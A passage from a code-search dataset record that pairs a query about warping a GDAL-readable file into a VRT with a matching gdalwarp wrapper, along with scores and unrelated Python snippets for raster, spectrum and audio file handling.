str, out_file: str, sample_rate: float,\n max_time_gap: timedelta):\n\n self.in_file = in_file\n self.out_file = out_file\n\n # Set up the input/output file objects:\n self.in_data = MobileData(in_file, 'r')\n self.out_data = MobileData(out_file, 'w')\n\n # Hold information about the different fields to use:\n # All fields in the input file:\n self.all_fields = None # type: Optional[Dict[str, str]]\n\n # Stamp field name:\n self.stamp_field = default_stamp_field\n\n # Only sensor fields:\n self.sensor_fields = None # type: Optional[Dict[str, str]]\n\n # List of label fields:\n self.label_fields = default_label_fields\n\n # Determine the output sample interval in seconds:\n self.sample_interval = timedelta(seconds=1.0 / sample_rate)\n\n # Maximum gap between input events - longer than this and we will restart resampling:\n self.max_time_gap = max_time_gap\n\n # The previous and next output stamps to use:\n self.prev_out_stamp = None # type: Optional[datetime]\n self.next_out_stamp = None # type: Optional[datetime]\n\n # The next event from the input file:\n self.next_input_event = None # type: Optional[Dict[str, Union[float, str, datetime, None]]]\n\n # The last-seen input event:\n self.last_seen_input_event = None # type: Optional[Dict[str, Union[float, str, datetime, None]]]\n\n # Information about input events seen in a sample interval:\n self.num_events_in_interval = 0\n self.interval_sensor_values = None # type: Optional[Dict[str, List[float, str]]]\n self.interval_labels = None # type: Optional[Dict[str, List[str]]]\n\n # Status update info:\n self.status_num_events_interval = status_num_events_interval\n self.num_input_events_processed = 0\n self.num_events_since_last_status = 0\n self.first_event_stamp = None # type: Optional[datetime]", "def rdmb_povray(file_base,\n 
time_point=2000,\n width=800, height=600,\n angle=14):\n\n file_prms = file_base + \"_prms.npz\"\n vs, *_ = load_rd_prms(file_prms)\n file_uv = file_base + \"_{:05}.npz\".format(time_point)\n\n file_png = file_base + \"_{:05}.png\".format(time_point)\n ucs, vcs = load_rd_uv(file_uv)\n\n rdmb_povray_save(file_png,\n vs,\n ucs, vcs,\n width=width, height=height,\n rotx=0, roty=0, rotz=0,\n angle=angle)\n\n return file_png", "def t1_loadFile(self):\n print \"subspectrumFile\"\n filename = tkFileDialog.askopenfilename()\n filename = self.filenameparser(filename)\n self.t1_filename = filename", "def convert_file(self, file_path: str) -> None:\n print(\n f\"Converting {os.path.split(file_path)[1]} to {self.output_format}\")\n\n output = AudioSegment.from_file(file_path, format=self.output_format)\n output.export(file_path.replace(self.input_format,\n f'{self.output_format}'), format=self.output_format)", "def test_input_flux_file():\n # Generate an input file\n flux_input_file = tstutils.data_path('test.flux')\n if os.path.isfile(flux_input_file):\n os.remove(flux_input_file)\n\n cfg_lines = ['[fluxcalib]']\n cfg_lines += [' extinct_correct = False # Set to True if your SENSFUNC derived with the UVIS algorithm\\n']\n cfg_lines += ['# Please add your SENSFUNC file name below before running pypeit_flux_calib']\n\n # These files need to be in tests/files/\n data = Table()\n data['filename'] = ['spec1d_cN20170331S0216-pisco_GNIRS_20170331T085412.181.fits',\n 'spec1d_cN20170331S0217-pisco_GNIRS_20170331T085933.097.fits']\n data['sensfile'] = 'sens_cN20170331S0206-HIP62745_GNIRS_20170331T083351.681.fits'\n # \n paths = [tstutils.data_path('')]\n\n fluxFile = inputfiles.FluxFile(config=cfg_lines, \n file_paths=paths,\n data_table=data)\n # Write\n fluxFile.write(flux_input_file)\n\n # Read\n fluxFile2 = inputfiles.FluxFile.from_file(flux_input_file)\n assert np.all(fluxFile2.data['filename'] == data['filename'])\n\n # Test path\n assert fluxFile2.file_paths[0] == paths[0]\n assert fluxFile2.filenames[0] == os.path.join(paths[0], data['filename'][0])\n\n # #################\n # Tickle the other ways to do sensfiles\n data3 = Table()\n data3['filename'] = ['spec1d_cN20170331S0216-pisco_GNIRS_20170331T085412.181.fits',\n 'spec1d_cN20170331S0217-pisco_GNIRS_20170331T085933.097.fits']\n data3['sensfile'] = ['sens_cN20170331S0206-HIP62745_GNIRS_20170331T083351.681.fits',\n '']\n\n fluxFile3 = inputfiles.FluxFile(config=cfg_lines, \n file_paths=paths,\n data_table=data3)\n assert fluxFile3.sensfiles[1] == os.path.join(paths[0], data['sensfile'][0])\n \n data4 = Table()\n data4['filename'] = ['spec1d_cN20170331S0216-pisco_GNIRS_20170331T085412.181.fits',\n 'spec1d_cN20170331S0217-pisco_GNIRS_20170331T085933.097.fits']\n data4['sensfile'] = ''\n\n fluxFile4 = inputfiles.FluxFile(config=cfg_lines, \n file_paths=paths,\n data_table=data4)\n assert len(fluxFile4.sensfiles) == 0\n\n # Clean up\n os.remove(flux_input_file)", "def from_file(cls, infilename):\n\n spect_file_obj = _get_file_object(infilename)\n\n kwargs = {'counts': spect_file_obj.data,\n 'input_file_object': spect_file_obj,\n 'bin_edges_kev': spect_file_obj.bin_edges_kev}\n\n # TODO Get more attributes from self.infileobj\n\n return cls(**kwargs)", "def readNextGenSpectrum(fname=''):\n\n print('Reading : ', fname)\n\n with open(fname, 'r') as rfile:\n dum = rfile.readline()\n sdum = dum.split()\n teff = float(sdum[0])\n logg = float(sdum[1])\n mph = float(sdum[2])\n dum = rfile.readline()\n nwav = float(dum.split()[0])\n\n bigline = []\n dum = 
rfile.readline()\n while dum.strip() != '':\n sdum = dum.split()\n for i in range(len(sdum)):\n bigline.append(float(sdum[i]))\n dum = rfile.readline()\n\n bigline = np.array(bigline)\n # Convert wavelength from angstrom to micron\n wav = bigline[:nwav] / 1e4\n inu = bigline[nwav:2 * nwav]\n bnu = bigline[nwav * 2:nwav * 3]\n\n ii = wav.argsort()\n wav = wav[ii]\n inu = inu[ii] * 1e-8 * wav * 1e4 / np.pi / (29979245800.0 / wav * 1e4)\n bnu = bnu[ii] * 1e-8 * wav * 1e4 / np.pi / (29979245800.0 / wav * 1e4)\n\n #\n # The unit is now erg/s/cm/Hz/ster\n #\n\n return {'teff': teff, 'logg': logg, 'mph': mph, 'nwav': nwav, 'wav': wav, 'inu': inu, 'bnu': bnu}" ]
[ "0.5761271", "0.539191", "0.53234494", "0.5275649", "0.52752906", "0.527388", "0.5264173", "0.5234479", "0.52175415", "0.52002573", "0.51625293", "0.50720745", "0.50369114", "0.50217336", "0.4970289", "0.4957576", "0.4887836", "0.48874044", "0.48784587", "0.48682615", "0.48431507", "0.4821813", "0.4798794", "0.47955054", "0.47944763", "0.47788334", "0.4760828", "0.47491097", "0.47395235", "0.473859", "0.4728464", "0.47205108", "0.4718296", "0.4699509", "0.46907875", "0.46900317", "0.46839598", "0.46676472", "0.46654132", "0.4662987", "0.4661223", "0.46526825", "0.46471262", "0.46460265", "0.46451494", "0.46400797", "0.46325704", "0.46313334", "0.462308", "0.46189407", "0.46108603", "0.46087196", "0.46037698", "0.4601273", "0.4597162", "0.4594524", "0.45913455", "0.45891723", "0.4584942", "0.45793033", "0.45779246", "0.45749986", "0.45504475", "0.45463043", "0.4543516", "0.45414495", "0.452874", "0.45271194", "0.45237294", "0.45118976", "0.4500996", "0.450067", "0.44967198", "0.4493465", "0.44839185", "0.4480523", "0.4479649", "0.44785467", "0.44770253", "0.44769156", "0.44735265", "0.447134", "0.44712424", "0.44710973", "0.4469421", "0.44648623", "0.44594908", "0.44590545", "0.44494408", "0.4441082", "0.44405836", "0.4437614", "0.44366112", "0.4431811", "0.4430243", "0.44246772", "0.44173437", "0.44167867", "0.4416742", "0.44151467" ]
0.546153
1
Takes a GDAL-readable inputfile and generates the VRT to warp it.
def warp(inputfile, spatial_ref=None, cmd=GDALWARP, resampling=None,
         maximum_resolution=None):
    dataset = Dataset(inputfile)
    warp_cmd = [
        cmd,
        '-q',          # Quiet - FIXME: Use logging
        '-of', 'VRT',  # Output to VRT
    ]

    # Warping to Mercator.
    if spatial_ref is None:
        spatial_ref = SpatialReference.FromEPSG(EPSG_WEB_MERCATOR)
    warp_cmd.extend(['-t_srs', spatial_ref.GetEPSGString()])

    # Resampling method
    if resampling is not None:
        if not isinstance(resampling, basestring):
            try:
                resampling = RESAMPLING_METHODS[resampling]
            except KeyError:
                raise UnknownResamplingMethodError(resampling)
        elif resampling not in list(RESAMPLING_METHODS.values()):
            raise UnknownResamplingMethodError(resampling)
        warp_cmd.extend(['-r', resampling])

    # Propagate No Data Value
    nodata_values = [dataset.GetRasterBand(i).GetNoDataValue()
                     for i in range(1, dataset.RasterCount + 1)]
    if any(nodata_values):
        nodata_values = [str(v).lower() for v in nodata_values]
        warp_cmd.extend(['-dstnodata', ' '.join(nodata_values)])

    # Call gdalwarp
    warp_cmd.extend([inputfile, '/vsistdout'])
    try:
        return VRT(check_output_gdal([str(e) for e in warp_cmd]))
    except CalledGdalError as e:
        if e.error == ("ERROR 6: Read or update mode not supported on /vsistdout"):
            return VRT(e.output)
        raise
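A minimal usage sketch, not part of the source row: it assumes this module's GDALWARP constant, Dataset/VRT wrappers and RESAMPLING_METHODS mapping are importable as shown above, that 'bilinear' is one of the names in RESAMPLING_METHODS, and that 'input.tif' is a placeholder path.

# Hypothetical example: warp a GeoTIFF to the default Web Mercator target
# using bilinear resampling. warp() shells out to gdalwarp with '-of VRT'
# and returns a VRT object wrapping the XML written to /vsistdout, rather
# than writing a warped raster to disk.
vrt = warp('input.tif', resampling='bilinear')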
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_vrt(self):\n for index, i in enumerate(self.months):\n month = str(index + 1)\n if len(month) < 2:\n month = '0' + month\n txt_file = i.joinpath('subnational/tiffs.txt')\n outfile = i.joinpath(f'{self.country}_{month}_normalised.vrt')\n if not outfile.exists():\n gdal_cmd = f'gdalbuildvrt -input_file_list {str(txt_file)} {str(outfile)}'\n subprocess.call(gdal_cmd, shell=True)", "def convert_vrt(fname, out_fname, dataset_name='dataset',\n compression=H5CompressionFilter.LZF, filter_opts=None,\n attrs=None):\n with h5py.File(out_fname) as fid:\n with rasterio.open(fname) as rds:\n # set default chunks and set dimensions\n if rds.count == 3:\n chunks = (3, 256, 256)\n dims = (3, rds.height, rds.width)\n else:\n chunks = (256, 256)\n dims = (rds.height, rds.width)\n\n # create empty or copy the user supplied filter options\n if not filter_opts:\n filter_opts = dict()\n filter_opts['chunks'] = chunks\n else:\n filter_opts = filter_opts.copy()\n\n\n if 'chunks' not in filter_opts:\n filter_opts['chunks'] = chunks\n\n # modify to have 3D chunks if we have a multiband vrt\n if rds.count == 3 and len(filter_opts['chunks']) != 3:\n # copy the users original 2D chunk and insert the third\n chunks = list(filter_opts['chunks'])\n chunks.insert(0, 3)\n filter_opts['chunks'] = chunks\n\n # dataset attributes\n if attrs:\n attrs = attrs.copy()\n else:\n attrs = {}\n\n attrs['geotransform'] = rds.transform.to_gdal()\n attrs['crs_wkt'] = rds.crs.wkt\n\n # dataset creation options\n kwargs = compression.config(**filter_opts).dataset_compression_kwargs()\n kwargs['shape'] = dims\n kwargs['dtype'] = rds.dtypes[0]\n\n dataset = fid.create_dataset(dataset_name, **kwargs)\n attach_image_attributes(dataset, attrs)\n\n # tiled processing (all cols by chunked rows)\n ytile = filter_opts['chunks'][1] if rds.count == 3 else filter_opts['chunks'][0]\n tiles = generate_tiles(rds.width, rds.height, rds.width, ytile)\n\n for tile in tiles:\n # numpy index\n if rds.count == 3:\n idx = (\n slice(None),\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n else:\n idx = (\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n\n # ensure single band rds is read as 2D not 3D\n data = rds.read(window=tile) if rds.count == 3 else rds.read(1, window=tile)\n\n # write\n dataset[idx] = data", "def run_vorpaline(self, input_file, *options):\n\n self._input_file = input_file\n args = list(options) + [self._input_file, 'out.meshb']\n self._run_command(\"vorpalite\", args)", "def build_vrt(vrt: str, files: List[str], resample_name: str) -> None:\n\n options = gdal.BuildVRTOptions(srcNodata=0)\n gdal.BuildVRT(destName=vrt, srcDSOrSrcDSTab=files, options=options)\n add_pixel_fn(vrt, resample_name)", "def copy_vrt(in_fname, out_fname=None, bbox=None, verbose=True):\n from gdal import Translate\n\n if out_fname is None:\n out_fname = in_fname + \".vrt\"\n\n # Using Translate... 
but would use Warp if every reprojecting\n if bbox:\n left, bottom, right, top = bbox\n projwin = (left, top, right, bottom) # unclear why Translate does UL LR\n else:\n projwin = None\n if verbose:\n logger.info(f\"Creating {out_fname}, subset bbox: {bbox}\")\n Translate(out_fname, in_fname, projWin=projwin)", "def buildvrt(indir, outdir):\n indir = Path(indir)\n outdir = Path(outdir)\n\n # loop over each day directory\n for day in indir.iterdir():\n # expecting 20 subdatasets in each hdf4 file (hopefully the order gdal lists them in is consistent)\n subdataset_fnames = {i: [] for i in range(20)}\n\n # mosaic each MODIS tile for the current day directory\n for h4_fname in day.rglob('*.hdf'):\n with rasterio.open(str(h4_fname.absolute())) as h4_ds:\n\n # each subdataset will form a separate mosaic\n for i, sds_name in enumerate(h4_ds.subdatasets):\n subdataset_fnames[i].append(sds_name)\n\n # loop over each subdataset and mosaic from all supporting MODIS tiles\n for _, file_list in subdataset_fnames.items():\n\n # temp file for the input file list\n with tempfile.NamedTemporaryFile('w') as tmpf:\n tmpf.writelines(\"\\n\".join(file_list))\n tmpf.flush()\n\n # mimic the 'day' directory partition\n base_name = Path(file_list[0].replace(':', '/')).name\n out_fname = outdir.joinpath(day.name, '{}.vrt'.format(base_name))\n\n if not out_fname.parent.exists():\n out_fname.parent.mkdir(parents=True)\n\n # buildvrt\n cmd = [\n 'gdalbuildvrt',\n '-input_file_list',\n tmpf.name,\n str(out_fname)\n ]\n\n check_call(cmd)", "def merge(files: List[str], output_file: str, resample: str = \"average\") -> None:\n\n build_vrt(constants.TEMP_VRT_FILE, files, resample)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', 'YES')\n\n gdal.Translate(destName=output_file, srcDS=constants.TEMP_VRT_FILE)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', None)\n\n if os.path.isfile(constants.TEMP_VRT_FILE):\n os.remove(constants.TEMP_VRT_FILE)", "def open_input(self):\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"YES\")\n gdal.AllRegister()\n # self.options.verbose=True\n if self.options.tms_osm:\n self.s_y_type=\"osm\"\n else:\n self.s_y_type=\"tms\"\n if self.options.verbose:\n print \"open_input :\", self.input,\" osm[\",self.options.tms_osm,\",\",self.s_y_type,\"] mbtiles[\",self.options.mbtiles,\"] mbtiles_todisk[\",self.options.mbtiles_todisk,\"] mbtiles_fromdisk[\",self.options.mbtiles_fromdisk,\"]\";\n # Open the input file\n if self.input:\n self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)\n else:\n raise Exception(\"No input file was specified\")\n\n if self.options.verbose:\n print \"Input file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n if not self.in_ds:\n # Note: GDAL prints the ERROR message too\n self.error(\"It is not possible to open the input file '%s'.\" % self.input )\n\n # Read metadata from the input file\n if self.in_ds.RasterCount == 0:\n self.error( \"Input file '%s' has no raster band\" % self.input )\n\n if self.in_ds.GetRasterBand(1).GetRasterColorTable():\n # TODO: Process directly paletted dataset by generating VRT in memory\n self.error( \"Please convert this file to RGB/RGBA and run gdal2mbtiles on the result.\",\n \"\"\"From paletted file you can create RGBA file (temp.vrt) by:\ngdal_translate -of vrt -expand rgba %s temp.vrt\nthen run:\ngdal2mbtiles temp.vrt\"\"\" % self.input )\n\n # Get NODATA value\n # User supplied values overwrite everything else.\n if self.options.srcnodata is not None:\n nds = map(float, 
self.options.srcnodata.split(','))\n if len(nds) < self.in_ds.RasterCount:\n self.in_nodata = (nds * self.in_ds.RasterCount)[:self.in_ds.RasterCount]\n else:\n self.in_nodata = nds\n else:\n # If the source dataset has NODATA, use it.\n self.in_nodata = []\n for i in range(1, self.in_ds.RasterCount+1):\n if self.in_ds.GetRasterBand(i).GetNoDataValue() != None:\n self.in_nodata.append( self.in_ds.GetRasterBand(i).GetNoDataValue() )\n\n if self.options.verbose:\n print \"NODATA: %s\" % self.in_nodata\n\n # INIT DEST\n if self.options.init_dest is not None:\n if self.options.tile_format == \"jpeg\":\n if self.in_ds.RasterCount == 4:\n nbands = 3\n else:\n nbands = self.in_ds.RasterCount\n\n nds = map(float, self.options.init_dest.split(','))\n\n if len(nds) == 1:\n init_dest = nds * nbands\n elif len(nds) == nbands:\n init_dest = nds\n else:\n print \"WARNING: you suplied %d '--init-dest' values but the dataset has %d data bands\" % (len(nds), nbands)\n init_dest = None\n else:\n init_dest = None\n print \"WARNING: --init-dest can be used only with 'jpeg' tile format\"\n else:\n if self.options.tile_format == \"jpeg\":\n init_dest = [255,255,255]\n else:\n init_dest = None\n\n #\n # Here we should have RGBA input dataset opened in self.in_ds\n #\n\n if self.options.verbose:\n print \"Preprocessed file:\", \"( %sP x %sL - %s bands)\" % (self.in_ds.RasterXSize, self.in_ds.RasterYSize, self.in_ds.RasterCount)\n\n # Spatial Reference System of the input raster\n\n\n self.in_srs = None\n\n if self.options.s_srs:\n self.in_srs = osr.SpatialReference()\n self.in_srs.SetFromUserInput(self.options.s_srs)\n self.in_srs_wkt = self.in_srs.ExportToWkt()\n else:\n self.in_srs_wkt = self.in_ds.GetProjection()\n if not self.in_srs_wkt and self.in_ds.GetGCPCount() != 0:\n self.in_srs_wkt = self.in_ds.GetGCPProjection()\n if self.in_srs_wkt:\n self.in_srs = osr.SpatialReference()\n self.in_srs.ImportFromWkt(self.in_srs_wkt)\n #elif self.options.profile != 'raster':\n # self.error(\"There is no spatial reference system info included in the input file.\",\"You should run gdal2mbtiles with --s_srs EPSG:XXXX or similar.\")\n\n # Spatial Reference System of tiles\n\n self.out_srs = osr.SpatialReference()\n\n if self.options.profile == 'mercator':\n self.out_srs.ImportFromEPSG(900913)\n elif self.options.profile in ('geodetic', 'gearth', 'garmin'):\n self.out_srs.ImportFromEPSG(4326)\n else:\n self.out_srs = self.in_srs\n\n # Are the reference systems the same? Reproject if necessary.\n\n self.out_ds = None\n\n if self.options.profile in ('mercator', 'geodetic', 'gearth', 'garmin'):\n\n if (self.in_ds.GetGeoTransform() == (0.0, 1.0, 0.0, 0.0, 0.0, 1.0)) and (self.in_ds.GetGCPCount() == 0):\n self.error(\"There is no georeference - neither affine transformation (worldfile) nor GCPs. You can generate only 'raster' profile tiles.\",\n \"Either gdal2mbtiles with parameter -p 'raster' or use another GIS software for georeference e.g. 
gdal_transform -gcp / -a_ullr / -a_srs\")\n\n if self.in_srs:\n\n if (self.in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or (self.in_ds.GetGCPCount() != 0):\n\n # Generation of VRT dataset in tile projection, default 'nearest neighbour' warping\n self.out_ds = gdal.AutoCreateWarpedVRT( self.in_ds, self.in_srs_wkt, self.out_srs.ExportToWkt() )\n\n # TODO: HIGH PRIORITY: Correction of AutoCreateWarpedVRT according the max zoomlevel for correct direct warping!!!\n\n if self.options.verbose:\n print \"Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')\"\n self.out_ds.GetDriver().CreateCopy(\"tiles.vrt\", self.out_ds)\n\n # Note: self.in_srs and self.in_srs_wkt contain still the non-warped reference system!!!\n\n # Correction of AutoCreateWarpedVRT for NODATA values\n if self.in_nodata != []:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<GDALWarpOptions>\"\"\",\"\"\"<GDALWarpOptions>\n <Option name=\"UNIFIED_SRC_NODATA\">YES</Option>\n <Option name=\"INIT_DEST\">NO_DATA</Option>\"\"\")\n # replace BandMapping tag for NODATA bands....\n if init_dest is None:\n dstnodata = self.in_nodata\n else:\n dstnodata = init_dest\n for i in range(len(self.in_nodata)):\n s = s.replace(\"\"\"<BandMapping src=\"%i\" dst=\"%i\"/>\"\"\" % ((i+1),(i+1)),\"\"\"<BandMapping src=\"%i\" dst=\"%i\">\n <SrcNoDataReal>%i</SrcNoDataReal>\n <SrcNoDataImag>0</SrcNoDataImag>\n <DstNoDataReal>%i</DstNoDataReal>\n <DstNoDataImag>0</DstNoDataImag>\n </BandMapping>\"\"\" % ((i+1), (i+1), self.in_nodata[i], dstnodata[i]))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n # set NODATA_VALUE metadata\n self.out_ds.SetMetadataItem('NODATA_VALUES','%s' % \" \".join(str(int(f)) for f in self.in_nodata))\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # -----------------------------------\n # Correction of AutoCreateWarpedVRT for Mono (1 band) and RGB (3 bands) files without NODATA:\n # equivalent of gdalwarp -dstalpha\n elif self.in_nodata == [] and self.out_ds.RasterCount in (1,3):\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"<BlockXSize>\"\"\",\"\"\"<VRTRasterBand dataType=\"Byte\" band=\"%i\" subClass=\"VRTWarpedRasterBand\">\n <ColorInterp>Alpha</ColorInterp>\n </VRTRasterBand>\n <BlockXSize>\"\"\" % (self.out_ds.RasterCount + 1))\n s = s.replace(\"\"\"</GDALWarpOptions>\"\"\", \"\"\"<DstAlphaBand>%i</DstAlphaBand>\n </GDALWarpOptions>\"\"\" % (self.out_ds.RasterCount + 1))\n if init_dest is None:\n init_dest_str = \"0\"\n else:\n init_dest_str = \",\".join(str(f) for f in init_dest)\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % init_dest_str)\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print 
\"Modified -dstalpha warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n elif init_dest is not None:\n import tempfile\n tempfilename = tempfile.mktemp('-gdal2mbtiles.vrt')\n self.out_ds.GetDriver().CreateCopy(tempfilename, self.out_ds)\n # open as a text file\n s = open(tempfilename).read()\n # Add the warping options\n s = s.replace(\"\"\"</WorkingDataType>\"\"\", \"\"\"</WorkingDataType>\n <Option name=\"INIT_DEST\">%s</Option>\"\"\" % \",\".join(str(f) for f in init_dest))\n # save the corrected VRT\n open(tempfilename,\"w\").write(s)\n # open by GDAL as self.out_ds\n self.out_ds = gdal.Open(tempfilename) #, gdal.GA_ReadOnly)\n # delete the temporary file\n os.unlink(tempfilename)\n\n if self.options.verbose:\n print \"Modified warping result saved into 'tiles1.vrt'\"\n open(\"tiles1.vrt\",\"w\").write(s)\n\n # For raster with 4-bands: 4th unknown band set to alpha\n if (self.out_ds.RasterCount == 4\n and self.out_ds.GetRasterBand(4).GetRasterColorInterpretation() == gdal.GCI_Undefined):\n self.out_ds.GetRasterBand(4).SetRasterColorInterpretation(gdal.GCI_AlphaBand)\n\n s = '''\n '''\n\n else:\n self.error(\"Input file has unknown SRS.\", \"Use --s_srs ESPG:xyz (or similar) to provide source reference system.\" )\n\n if self.out_ds and self.options.verbose:\n print \"Projected file:\", \"tiles.vrt\", \"( %sP x %sL - %s bands)\" % (self.out_ds.RasterXSize, self.out_ds.RasterYSize, self.out_ds.RasterCount)\n\n if not self.out_ds:\n self.out_ds = self.in_ds\n\n #\n # Here we should have a raster (out_ds) in the correct Spatial Reference system\n #\n\n # KML test\n self.isepsg4326 = False\n srs4326 = osr.SpatialReference()\n srs4326.ImportFromEPSG(4326)\n if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():\n self.kml = True\n self.isepsg4326 = True\n if self.options.verbose:\n print \"KML autotest OK!\"\n\n # Read the georeference\n\n self.out_gt = self.out_ds.GetGeoTransform()\n\n #originX, originY = self.out_gt[0], self.out_gt[3]\n #pixelSize = self.out_gt[1] # = self.out_gt[5]\n\n # Test the size of the pixel\n\n # MAPTILER - COMMENTED\n #if self.out_gt[1] != (-1 * self.out_gt[5]) and self.options.profile != 'raster':\n # TODO: Process corectly coordinates with are have swichted Y axis (display in OpenLayers too)\n #self.error(\"Size of the pixel in the output differ for X and Y axes.\")\n\n # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)\n if (self.out_gt[2], self.out_gt[4]) != (0,0):\n self.error(\"Georeference of the raster contains rotation or skew. Such raster is not supported. 
Please use gdalwarp first.\")\n # TODO: Do the warping in this case automaticaly\n\n #\n # Here we expect: pixel is square, no rotation on the raster\n #\n\n # Output Bounds - coordinates in the output SRS\n self.ominx = self.out_gt[0]\n self.omaxx = self.out_gt[0]+self.out_ds.RasterXSize*self.out_gt[1]\n self.omaxy = self.out_gt[3]\n self.ominy = self.out_gt[3]-self.out_ds.RasterYSize*self.out_gt[1]\n # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15\n # user defined bounds to extract - coordinates in the output SRS\n if self.options.te_bounds != '':\n if self.te_minx >= self.ominx and self.te_minx <= self.omaxx:\n if self.te_maxx >= self.ominx and self.te_maxx <= self.omaxx:\n if self.te_miny >= self.ominy and self.te_miny <= self.omaxy:\n if self.te_maxy >= self.ominy and self.te_maxy <= self.omaxy:\n # replace only if inside the read bounds\n self.ominx = self.te_minx\n self.omaxx = self.te_maxx\n self.ominy = self.te_miny\n self.omaxy = self.te_maxy\n if self.options.verbose:\n print \"User defined Bounds (output srs) have been set:\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.verbose:\n print \"Bounds (output srs):\", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy\n\n if self.options.mbtiles:\n self.options.profile = 'mercator'\n if self.options.profile == 'mercator':\n self.mercator = GlobalMercator(self.options.tms_osm) # from globalmaptiles.py\n\n #\n # Calculating ranges for tiles in different zoom levels\n #\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.mercator.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax = range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.mercator.MetersToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.mercator.MetersToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the minimal zoom level (map covers area equivalent to one tile)\n if self.tminz == None:\n self.tminz = self.mercator.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.mercator.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.mercator.MetersToLatLon( self.ominx, self.ominy), self.mercator.MetersToLatLon( self.omaxx, self.omaxy)\n print 'MinZoomLevel:', self.tminz\n print \"MaxZoomLevel:\", self.tmaxz, \"(\", self.mercator.Resolution( self.tmaxz ),\")\"\n\n # this must be call befor ImageOutput is called (self.output may be changed)\n if self.options.mbtiles:\n if not self.mbtiles_db:\n self.mbtiles_setup(1);\n\n # Instantiate image output.\n self.image_output = ImageOutput(self.options.tile_format, self.out_ds, self.tilesize,\n self.options.resampling, init_dest, self.output,\n self.options.verbose,self.options.mbtiles)\n if self.options.profile == 'geodetic':\n\n self.geodetic = GlobalGeodetic() # from globalmaptiles.py\n\n # Function which generates SWNE in LatLong for given tile\n self.tileswne = self.geodetic.TileLatLonBounds\n\n # Generate table with min max tile coordinates for all zoomlevels\n self.tminmax 
= range(0,32)\n for tz in range(0, 32):\n tminx, tminy = self.geodetic.LatLonToTile( self.ominx, self.ominy, tz )\n tmaxx, tmaxy = self.geodetic.LatLonToTile( self.omaxx, self.omaxy, tz )\n # crop tiles extending world limits (+-180,+-90)\n tminx, tminy = max(0, tminx), max(0, tminy)\n tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)\n self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)\n\n # TODO: Maps crossing 180E (Alaska?)\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tminz == None:\n self.tminz = self.geodetic.ZoomForPixelSize( self.out_gt[1] * max( self.out_ds.RasterXSize, self.out_ds.RasterYSize) / float(self.tilesize) )\n\n # Get the maximal zoom level (closest possible zoom level up on the resolution of raster)\n if self.tmaxz == None:\n self.tmaxz = self.geodetic.ZoomForPixelSize( self.out_gt[1] )\n\n if self.options.verbose:\n print \"Bounds (latlong):\", self.ominx, self.ominy, self.omaxx, self.omaxy\n\n if self.options.profile in ('raster', 'gearth', 'garmin'):\n\n log2 = lambda x: math.log10(x) / math.log10(2) # log2 (base 2 logarithm)\n\n self.nativezoom = int(max( math.ceil(log2(self.out_ds.RasterXSize/float(self.tilesize))),\n math.ceil(log2(self.out_ds.RasterYSize/float(self.tilesize)))))\n\n if self.options.verbose:\n print \"Native zoom of the raster:\", self.nativezoom\n\n # Get the minimal zoom level (whole raster in one tile)\n if self.tminz == None:\n self.tminz = 0\n\n # Get the maximal zoom level (native resolution of the raster)\n if self.tmaxz == None:\n self.tmaxz = self.nativezoom\n\n # Garmin has maximally 100 